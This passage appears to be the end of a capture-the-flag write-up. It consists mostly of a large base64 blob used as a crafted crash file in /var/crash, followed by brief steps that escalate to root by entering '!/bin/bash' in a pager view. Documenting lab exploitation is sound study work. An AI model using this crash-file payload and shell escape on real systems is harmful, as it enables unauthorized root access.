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
I manually created a crash file at /var/crash
with .crash
extension with the above content and the exploit just worked fine as mentioned in the POC.
To get a root shell enter the below command in the pager view: !/bin/bash
We have successfully got a shell with root privileges.
Successfully got the root flag.
Thank You……